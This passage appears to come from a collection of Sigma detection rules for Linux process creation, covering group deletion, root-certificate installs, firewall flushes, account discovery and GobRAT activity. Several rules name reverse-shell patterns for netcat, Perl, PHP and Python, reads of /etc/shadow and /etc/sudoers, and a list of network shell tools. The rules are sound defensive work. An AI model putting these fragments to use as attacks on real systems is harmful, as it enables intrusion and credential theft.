    "content": "title: Group Has Been Deleted Via Groupdel\nid: 8a46f16c-8c4c-82d1-b121-0fdd3ba70a84\nstatus: test\ndescription: Detects execution of the \"groupdel\" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks\nreferences:\n    - https://linuxize.com/post/how-to-delete-group-in-linux/\n    - https://www.cyberciti.biz/faq/linux-remove-user-command/\n    - https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/\n    - https://linux.die.net/man/8/groupdel\nauthor: Tuan Le (NCSGroup)\ndate: 2022-12-26\ntags:\n    - attack.impact\n    - attack.t1531\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/groupdel'\n    condition: selection\nfalsepositives:\n    - Legitimate administrator activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml",
    "content": "title: Install Root Certificate\nid: 78a80655-a51e-4669-bc6b-e9d206a462ee\nstatus: test\ndescription: Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md\nauthor: Ömer Günal, oscd.community\ndate: 2020-10-05\nmodified: 2022-07-07\ntags:\n    - attack.defense-evasion\n    - attack.t1553.004\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith:\n            - '/update-ca-certificates'\n            - '/update-ca-trust'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_install_suspicious_packages.yml",
    "content": "title: Suspicious Package Installed - Linux\nid: 700fb7e8-2981-401c-8430-be58e189e741\nstatus: test\ndescription: Detects installation of suspicious packages using system installation utilities\nreferences:\n    - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-03\nmodified: 2026-01-01\ntags:\n    - attack.defense-evasion\n    - attack.t1553.004\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection_tool_apt:\n        Image|endswith:\n            - '/apt'\n            - '/apt-get'\n        CommandLine|contains: 'install'\n    selection_tool_yum:\n        Image|endswith: '/yum'\n        CommandLine|contains:\n            - 'localinstall'\n            - 'install'\n    selection_tool_rpm:\n        Image|endswith: '/rpm'\n        CommandLine|contains: '-i'\n    selection_tool_dpkg:\n        Image|endswith: '/dpkg'\n        CommandLine|contains:\n            - '--install'\n            - '-i'\n    selection_keyword:\n        CommandLine|contains:\n            # Add more suspicious packages\n            - 'nmap'\n            - ' nc'\n            - 'netcat'\n            - 'wireshark'\n            - 'tshark'\n            - 'openconnect'\n            - 'proxychains'\n            - 'socat'\n    condition: 1 of selection_tool_* and selection_keyword\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_iptables_flush_ufw.yml",
    "content": "title: Flush Iptables Ufw Chain\nid: 3be619f4-d9ec-4ea8-a173-18fdd01996ab\nstatus: test\ndescription: Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic\nreferences:\n    - https://blogs.blackberry.com/\n    - https://www.cyberciti.biz/tips/linux-iptables-how-to-flush-all-rules.html\n    - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-01-18\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection_img:\n        Image|endswith:\n            - '/iptables'\n            - '/xtables-legacy-multi'\n            - '/iptables-legacy-multi'\n            - '/ip6tables'\n            - '/ip6tables-legacy-multi'\n    selection_params:\n        CommandLine|contains:\n            - '-F'\n            - '-Z'\n            - '-X'\n    selection_ufw:\n        CommandLine|contains:\n            - 'ufw-logging-deny'\n            - 'ufw-logging-allow'\n            - 'ufw6-logging-deny'\n            - 'ufw6-logging-allow'\n            # - 'ufw-reject-output'\n            # - 'ufw-track-inputt'\n    condition: all of selection_*\nfalsepositives:\n    - Network administrators\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_local_account.yml",
    "content": "title: Local System Accounts Discovery - Linux\nid: b45e3d6f-42c6-47d8-a478-df6bd6cf534c\nstatus: test\ndescription: Detects enumeration of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md\n    - https://my.f5.com/manage/s/article/K589\n    - https://man.freebsd.org/cgi/man.cgi?pwd_mkdb\nauthor: Alejandro Ortuno, oscd.community, CheraghiMilad\ndate: 2020-10-08\nmodified: 2024-12-10\ntags:\n    - attack.discovery\n    - attack.t1087.001\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_1:\n        Image|endswith: '/lastlog'\n    selection_2:\n        CommandLine|contains: '''x:0:'''\n    selection_3:\n        Image|endswith:\n            - '/cat'\n            - '/ed'\n            - '/head'\n            - '/more'\n            - '/nano'\n            - '/tail'\n            - '/vi'\n            - '/vim'\n            - '/less'\n            - '/emacs'\n            - '/sqlite3'\n            - '/makemap'\n        CommandLine|contains:\n            - '/etc/passwd'\n            - '/etc/shadow'\n            - '/etc/sudoers'\n            - '/etc/spwd.db'\n            - '/etc/pwd.db'\n            - '/etc/master.passwd'\n    selection_4:\n        Image|endswith: '/id'\n    selection_5:\n        Image|endswith: '/lsof'\n        CommandLine|contains: '-u'\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_local_groups.yml",
    "content": "title: Local Groups Discovery - Linux\nid: 676381a6-15ca-4d73-a9c8-6a22e970b90d\nstatus: test\ndescription: Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md\nauthor: Ömer Günal, Alejandro Ortuno, oscd.community\ndate: 2020-10-11\nmodified: 2025-06-04\ntags:\n    - attack.discovery\n    - attack.t1069.001\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_1:\n        Image|endswith: '/groups'\n    selection_2:\n        Image|endswith:\n            - '/cat'\n            - '/ed'\n            - '/head'\n            - '/less'\n            - '/more'\n            - '/nano'\n            - '/tail'\n            - '/vi'\n            - '/vim'\n        CommandLine|contains: '/etc/group'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml",
    "content": "title: Potential GobRAT File Discovery Via Grep\nid: e34cfa0c-0a50-4210-9cb3-5632d08eb041\nstatus: test\ndescription: Detects the use of grep to discover specific files created by the GobRAT malware\nreferences:\n    - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html\n    - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection\n    - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-06-02\ntags:\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/grep'\n        CommandLine|contains:\n            - 'apached'\n            - 'frpc'\n            - 'sshd.sh'\n            - 'zone.arm'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation.yml",
    "content": "title: Named Pipe Created Via Mkfifo\nid: 9d779ce8-5256-4b13-8b6f-b91c602b43f4\nstatus: test\ndescription: Detects the creation of a new named pipe using the \"mkfifo\" utility\nreferences:\n    - https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk\n    - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-16\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/mkfifo'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml",
    "content": "title: Potentially Suspicious Named Pipe Created Via Mkfifo\nid: 999c3b12-0a8c-40b6-8e13-dd7d62b75c7a\nrelated:\n    - id: 9d779ce8-5256-4b13-8b6f-b91c602b43f4\n      type: derived\nstatus: test\ndescription: Detects the creation of a new named pipe using the \"mkfifo\" utility in a potentially suspicious location\nreferences:\n    - https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk\n    - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-16\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/mkfifo'\n        # Note: Add more potentially suspicious locations\n        CommandLine|contains: ' /tmp/'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_mount_hidepid.yml",
    "content": "title: Mount Execution With Hidepid Parameter\nid: ec52985a-d024-41e3-8ff6-14169039a0b3\nstatus: test\ndescription: Detects execution of the \"mount\" command with \"hidepid\" parameter to make invisible processes to other users from the system\nreferences:\n    - https://blogs.blackberry.com/\n    - https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/\n    - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-01-12\ntags:\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.t1564\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/mount'\n        CommandLine|contains|all:\n            - 'hidepid=2'\n            - ' -o '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml",
    "content": "title: Potential Netcat Reverse Shell Execution\nid: 7f734ed0-4f47-46c0-837f-6ee62505abd9\nstatus: test\ndescription: Detects execution of netcat with the \"-e\" flag followed by common shells. This could be a sign of a potential reverse shell setup.\nreferences:\n    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\n    - https://www.revshells.com/\n    - https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/\n    - https://www.infosecademy.com/netcat-reverse-shells/\n    - https://man7.org/linux/man-pages/man1/ncat.1.html\nauthor: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'\ndate: 2023-04-07\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_nc:\n        Image|endswith:\n            - '/nc'\n            - '/ncat'\n    selection_flags:\n        CommandLine|contains:\n            - ' -c '\n            - ' -e '\n    selection_shell:\n        CommandLine|contains:\n            - ' ash'\n            - ' bash'\n            - ' bsh'\n            - ' csh'\n            - ' ksh'\n            - ' pdksh'\n            - ' sh'\n            - ' tcsh'\n            - '/bin/ash'\n            - '/bin/bash'\n            - '/bin/bsh'\n            - '/bin/csh'\n            - '/bin/ksh'\n            - '/bin/pdksh'\n            - '/bin/sh'\n            - '/bin/tcsh'\n            - '/bin/zsh'\n            - '$IFSash'\n            - '$IFSbash'\n            - '$IFSbsh'\n            - '$IFScsh'\n            - '$IFSksh'\n            - '$IFSpdksh'\n            - '$IFSsh'\n            - '$IFStcsh'\n            - '$IFSzsh'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_nice_shell_execution.yml",
    "content": "title: Shell Execution via Nice - Linux\nid: 093d68c7-762a-42f4-9f46-95e79142571a\nstatus: test\ndescription: |\n    Detects the use of the \"nice\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\nreferences:\n    - https://gtfobins.github.io/gtfobins/nice/#shell\n    - https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html\nauthor: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)\ndate: 2024-09-02\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/nice'\n        CommandLine|endswith:\n            - '/bin/bash'\n            - '/bin/dash'\n            - '/bin/fish'\n            - '/bin/sh'\n            - '/bin/zsh'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_nohup.yml",
    "content": "title: Nohup Execution\nid: e4ffe466-6ff8-48d4-94bd-e32d1a6061e2\nstatus: test\ndescription: Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments\nreferences:\n    - https://gtfobins.github.io/gtfobins/nohup/\n    - https://en.wikipedia.org/wiki/Nohup\n    - https://www.computerhope.com/unix/unohup.htm\nauthor: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io'\ndate: 2022-06-06\ntags:\n    - attack.execution\n    - attack.t1059.004\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/nohup'\n    condition: selection\nfalsepositives:\n    - Administrators or installed processes that leverage nohup\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_nohup_susp_execution.yml",
    "content": "title: Suspicious Nohup Execution\nid: 457df417-8b9d-4912-85f3-9dbda39c3645\nrelated:\n    - id: e4ffe466-6ff8-48d4-94bd-e32d1a6061e2\n      type: derived\nstatus: test\ndescription: Detects execution of binaries located in potentially suspicious locations via \"nohup\"\nreferences:\n    - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html\n    - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/\n    - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection\n    - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-06-02\ntags:\n    - attack.execution\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/nohup'\n        CommandLine|contains: '/tmp/'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml",
    "content": "title: OMIGOD SCX RunAsProvider ExecuteScript\nid: 6eea1bf6-f8d2-488a-a742-e6ef6c1b67db\nstatus: test\ndescription: |\n    Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.\n    Script being executed gets created as a temp file in /tmp folder with a scx* prefix.\n    Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.\n    The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\n    Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\nreferences:\n    - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure\n    - https://github.com/Azure/Azure-Sentinel/pull/3059\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC\ndate: 2021-10-15\nmodified: 2022-10-05\ntags:\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.execution\n    - attack.t1068\n    - attack.t1190\n    - attack.t1203\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        User: root\n        LogonId: 0\n        CurrentDirectory: '/var/opt/microsoft/scx/tmp'\n        CommandLine|contains: '/etc/opt/microsoft/scx/conf/tmpdir/scx'\n    condition: selection\nfalsepositives:\n    - Legitimate use of SCX RunAsProvider ExecuteScript.\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml",
    "content": "title: OMIGOD SCX RunAsProvider ExecuteShellCommand\nid: 21541900-27a9-4454-9c4c-3f0a4240344a\nstatus: test\ndescription: |\n    Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\n    SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\n    Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\nreferences:\n    - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure\n    - https://github.com/Azure/Azure-Sentinel/pull/3059\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC\ndate: 2021-10-15\nmodified: 2022-10-05\ntags:\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.execution\n    - attack.t1068\n    - attack.t1190\n    - attack.t1203\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        User: root\n        LogonId: 0\n        CurrentDirectory: '/var/opt/microsoft/scx/tmp'\n        CommandLine|contains: '/bin/sh'\n    condition: selection\nfalsepositives:\n    - Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand.\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_perl_reverse_shell.yml",
    "content": "title: Potential Perl Reverse Shell Execution\nid: 259df6bc-003f-4306-9f54-4ff1a08fa38e\nstatus: test\ndescription: Detects execution of the perl binary with the \"-e\" flag and common strings related to potential reverse shell activity\nreferences:\n    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\n    - https://www.revshells.com/\nauthor: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'\ndate: 2023-04-07\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith: '/perl'\n        CommandLine|contains: ' -e '\n    selection_content:\n        - CommandLine|contains|all:\n              - 'fdopen('\n              - '::Socket::INET'\n        - CommandLine|contains|all:\n              - 'Socket'\n              - 'connect'\n              - 'open'\n              - 'exec'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_php_reverse_shell.yml",
    "content": "title: Potential PHP Reverse Shell\nid: c6714a24-d7d5-4283-a36b-3ffd091d5f7e\nstatus: test\ndescription: |\n    Detects usage of the PHP CLI with the \"-r\" flag which allows it to run inline PHP code. The rule looks for calls to the \"fsockopen\" function which allows the creation of sockets.\n    Attackers often leverage this in combination with functions such as \"exec\" or \"fopen\" to initiate a reverse shell connection.\nreferences:\n    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\n    - https://www.revshells.com/\nauthor: '@d4ns4n_'\ndate: 2023-04-07\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|contains: '/php'\n        CommandLine|contains|all:\n            - ' -r '\n            - 'fsockopen'\n        CommandLine|contains:\n            - 'ash'\n            - 'bash'\n            - 'bsh'\n            - 'csh'\n            - 'ksh'\n            - 'pdksh'\n            - 'sh'\n            - 'tcsh'\n            - 'zsh'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_pnscan_binary_cli_pattern.yml",
    "content": "title: Pnscan Binary Data Transmission Activity\nid: 97de11cd-4b67-4abf-9a8b-1020e670aa9e\nstatus: test\ndescription: |\n    Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network.\n    This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT\nauthor: David Burkett (@signalblur)\ndate: 2024-04-16\nreferences:\n    - https://www.cadosecurity.com/blog/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence\n    - https://intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf\n    - https://regex101.com/r/RugQYK/1\n    - https://www.virustotal.com/gui/file/beddf70a7bab805f0c0b69ac0989db6755949f9f68525c08cb874988353f78a9/content\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        CommandLine|re: -(W|R)\\s?(\\s|\"|')([0-9a-fA-F]{2}\\s?){2,20}(\\s|\"|')\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml",
    "content": "title: Connection Proxy\nid: 72f4ab3f-787d-495d-a55d-68c2ff46cf4c\nstatus: test\ndescription: Detects setting proxy configuration\nauthor: Ömer Günal\ndate: 2020-06-17\nmodified: 2022-10-05\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1090\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'http_proxy='\n            - 'https_proxy='\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_pua_trufflehog.yml",
    "content": "title: PUA - TruffleHog Execution - Linux\nid: d7a650c4-226c-451e-948f-cc490db506aa\nrelated:\n    - id: 44030449-b0df-4c94-aae1-502359ab28ee\n      type: similar\nstatus: experimental\ndescription: |\n    Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously.\n    While it is a legitimate tool, intended for use in CI pipelines and security assessments,\n    It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information.\nreferences:\n    - https://github.com/trufflesecurity/trufflehog\n    - https://www.getsafety.com/blog-posts/shai-hulud-npm-attack\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-09-24\ntags:\n    - attack.discovery\n    - attack.credential-access\n    - attack.t1083\n    - attack.t1552.001\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith: '/trufflehog'\n    selection_cli_platform:\n        CommandLine|contains:\n            - ' docker --image '\n            - ' Git '\n            - ' GitHub '\n            - ' Jira '\n            - ' Slack '\n            - ' Confluence '\n            - ' SharePoint '\n            - ' s3 '\n            - ' gcs '\n    selection_cli_verified:\n        CommandLine|contains: ' --results=verified'\n    condition: selection_img or all of selection_cli_*\nfalsepositives:\n    - Legitimate use of TruffleHog by security teams or developers.\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_python_http_server_execution.yml",
    "content": "title: Python WebServer Execution - Linux\nid: 3f0f5957-04f8-4792-ad89-192b0303bde6\nstatus: experimental\ndescription: |\n    Detects the execution of Python web servers via command line interface (CLI).\n    After gaining access to target systems, adversaries may use Python's built-in HTTP server modules to quickly establish a web server without requiring additional software.\n    This technique is commonly used in post-exploitation scenarios as it provides a simple method for transferring files between the compromised host and attacker-controlled systems.\nreferences:\n    - https://www.atomicredteam.io/atomic-red-team/atomics/T1048.003#atomic-test-8---python3-httpserver\n    - https://docs.python.org/3/library/http.server.html\n    - https://docs.python.org/2/library/simplehttpserver.html\nauthor: Mohamed LAKRI\ndate: 2025-10-17\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '/python'\n              - '/python2'\n              - '/python3'\n        - Image|contains:\n              - '/python2.'  # python image is always of the form ../python3.10; ../python is just a symlink\n              - '/python3.'\n    selection_module:\n        CommandLine|contains:\n            - 'http.server'\n            - 'SimpleHTTPServer'\n    condition: all of selection_*\nfalsepositives:\n    - Testing or development activity\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml",
    "content": "title: Python Spawning Pretty TTY Via PTY Module\nid: c4042d54-110d-45dd-a0e1-05c47822c937\nrelated:\n    - id: 32e62bc7-3de0-4bb1-90af-532978fe42c0\n      type: similar\nstatus: test\ndescription: |\n    Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity.\nreferences:\n    - https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/\nauthor: Nextron Systems\ndate: 2022-06-03\nmodified: 2024-11-04\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '/python'\n              - '/python2'\n              - '/python3'\n        - Image|contains:\n              - '/python2.'  # python image is always of the form ../python3.10; ../python is just a symlink\n              - '/python3.'\n    selection_cli_import:\n        CommandLine|contains:\n            - 'import pty'\n            - 'from pty '\n    selection_cli_spawn:\n        CommandLine|contains: 'spawn'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_python_reverse_shell.yml",
    "content": "title: Python Reverse Shell Execution Via PTY And Socket Modules\nid: 32e62bc7-3de0-4bb1-90af-532978fe42c0\nrelated:\n    - id: c4042d54-110d-45dd-a0e1-05c47822c937\n      type: similar\nstatus: test\ndescription: |\n    Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.\nreferences:\n    - https://www.revshells.com/\nauthor: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'\ndate: 2023-04-24\nmodified: 2024-11-04\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|contains: 'python'\n        CommandLine|contains|all:\n            - ' -c '\n            - 'import'\n            - 'pty'\n            - 'socket'\n            - 'spawn'\n            - '.connect'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_python_shell_os_system.yml",
    "content": "title: Inline Python Execution - Spawn Shell Via OS System Library\nid: 2d2f44ff-4611-4778-a8fc-323a0e9850cc\nstatus: test\ndescription: |\n    Detects execution of inline Python code via the \"-c\" in order to call the \"system\" function from the \"os\" library, and spawn a shell.\nreferences:\n    - https://gtfobins.github.io/gtfobins/python/#shell\nauthor: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)\ndate: 2024-09-02\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '/python'\n              - '/python2'\n              - '/python3'\n        - Image|contains:\n              - '/python2.'  # python image is always of the form ../python3.10; ../python is just a symlink\n              - '/python3.'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' -c '\n            - 'os.system('\n        CommandLine|contains:\n            - '/bin/bash'\n            - '/bin/dash'\n            - '/bin/fish'\n            - '/bin/sh'\n            - '/bin/zsh'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_remote_access_tools_teamviewer_incoming_connection.yml",
    "content": "title: Remote Access Tool - Team Viewer Session Started On Linux Host\nid: 1f6b8cd4-3e60-47cc-b282-5aa1cbc9182d\nrelated:\n    - id: ab70c354-d9ac-4e11-bbb6-ec8e3b153357\n      type: similar\n    - id: f459ccb4-9805-41ea-b5b2-55e279e2424a\n      type: similar\nstatus: test\ndescription: |\n    Detects the command line executed when TeamViewer starts a session started by a remote host.\n    Once a connection has been started, an investigator can verify the connection details by viewing the \"incoming_connections.txt\" log file in the TeamViewer folder.\nreferences:\n    - Internal Research\nauthor: Josh Nickels, Qi Nan\ndate: 2024-03-11\ntags:\n    - attack.persistence\n    - attack.initial-access\n    - attack.t1133\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        ParentImage|endswith: '/TeamViewer_Service'\n        Image|endswith: '/TeamViewer_Desktop'\n        CommandLine|endswith: '/TeamViewer_Desktop --IPCport 5939 --Module 1'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of TeamViewer\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml",
    "content": "title: Linux Remote System Discovery\nid: 11063ec2-de63-4153-935e-b1a8b9e616f1\nstatus: test\ndescription: Detects the enumeration of other remote systems.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md\nauthor: Alejandro Ortuno, oscd.community\ndate: 2020-10-22\nmodified: 2021-11-27\ntags:\n    - attack.discovery\n    - attack.t1018\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_1:\n        Image|endswith: '/arp'\n        CommandLine|contains: '-a'\n    selection_2:\n        Image|endswith: '/ping'\n        CommandLine|contains:\n            - ' 10.' # 10.0.0.0/8\n            - ' 192.168.' # 192.168.0.0/16\n            - ' 172.16.' # 172.16.0.0/12\n            - ' 172.17.'\n            - ' 172.18.'\n            - ' 172.19.'\n            - ' 172.20.'\n            - ' 172.21.'\n            - ' 172.22.'\n            - ' 172.23.'\n            - ' 172.24.'\n            - ' 172.25.'\n            - ' 